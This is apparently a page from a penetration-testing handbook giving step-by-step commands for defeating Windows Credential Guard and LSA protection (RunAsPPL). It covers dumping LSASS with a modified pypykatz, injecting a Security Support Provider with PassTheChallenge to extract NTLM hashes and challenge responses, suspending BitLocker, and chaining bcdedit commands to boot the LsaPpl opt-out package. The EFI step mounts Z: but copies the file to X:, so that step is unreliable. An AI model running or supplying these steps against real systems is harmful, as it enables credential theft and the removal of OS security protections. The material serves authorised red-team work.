Syslifters Handbook

English

Deutsch

English

Deutsch

Appearance

Credential Guard & RunAsPPL

Registering a new Security Support Provider

We can create a new SSP that hooks into LSA and communicates with LSAIso. Use ly4k/PassTheChallenge to obtain NTLMv1 (nthash) or NTLMv2 (challenge) output from Credential Guard-isolated MSV via an injected SSP.

  1. Dump LSASS with the modified version of pypykatz

    bash
    python3 -m pypykatz lsa minidump lsass.dmp -p msv

    For each interesting == MSV == block, record Context Handle, Proxy Info, and Encrypted blob (hex). Format addresses as <ContextHandle>:<ProxyInfo> (same style as the tool examples).

  2. Inject the SSP on the live target (still as SYSTEM / equivalent):

    powershell
    .\PassTheChallenge.exe inject
# or: .\PassTheChallenge.exe inject 'C:\path\SecurityPackage.dll'

  3. Confirm the RPC server:

    powershell
    .\PassTheChallenge.exe ping

  4. Choose an output path

    • NTLMv1-oriented / "NTHASH" line (README nthash; optional 8-byte server challenge, else default 1122334455667788):

      powershell
      .\PassTheChallenge.exe nthash <ContextHandle>:<ProxyInfo> <EncryptedBlobHEX>

    • NTLMv2 response (README challenge; IFCR "pass the challenge" against a real server challenge). Supply the blob and a server-challenge string exactly as the tool expects: <UTF16_HEX_domain>:<UTF16_HEX_username>:<HEX_server_name>:<HEX_server_challenge>

      powershell
      .\PassTheChallenge.exe challenge <ContextHandle>:<ProxyInfo> <EncryptedBlobHEX> <UTF16_HEX_domain>:<UTF16_HEX_username>:<HEX_server_name>:<HEX_server_challenge>

Background: Defeating Credential Guard and IFCR Pass-the-Challenge.

Disable LSA protection

If Credential Guard is not running and you want to dump LSASS, deactivate RunAsPPL. If secure boot is enabled, you also have to disable LSA protection (Microsoft docs):

  1. Check if RunAsPPL is active
powershell
Get-WinEvent -LogName System -MaxEvents 500 |
  Where-Object { $_.ProviderName -eq 'Microsoft-Windows-Wininit' -and $_.Id -eq 12 } |
  Select-Object -First 3 TimeCreated, Message |
  Format-List
  1. Suspend BitLocker
powershell
Suspend-BitLocker -MountPoint C: -RebootCount 2

  1. Download LsaPpl Opt-Out for your architecture.

  2. Mount the EFI partition and copy the opt-out package.

sh
mountvol Z: /s
copy C:\LsaPplConfig.efi X:\EFI\Microsoft\Boot\LsaPplConfig.efi /Y

bcdedit /create {b5ca5172-7d7b-4c9e-9d3b-3d4a4f7d2c10} /d "LsaPpl Opt-Out" /application osloader
bcdedit /set    {b5ca5172-7d7b-4c9e-9d3b-3d4a4f7d2c10} path "\EFI\Microsoft\Boot\LsaPplConfig.efi"
bcdedit /set    {b5ca5172-7d7b-4c9e-9d3b-3d4a4f7d2c10} device partition=Z:
bcdedit /set    {bootmgr} bootsequence {b5ca5172-7d7b-4c9e-9d3b-3d4a4f7d2c10}

mountvol Z: /d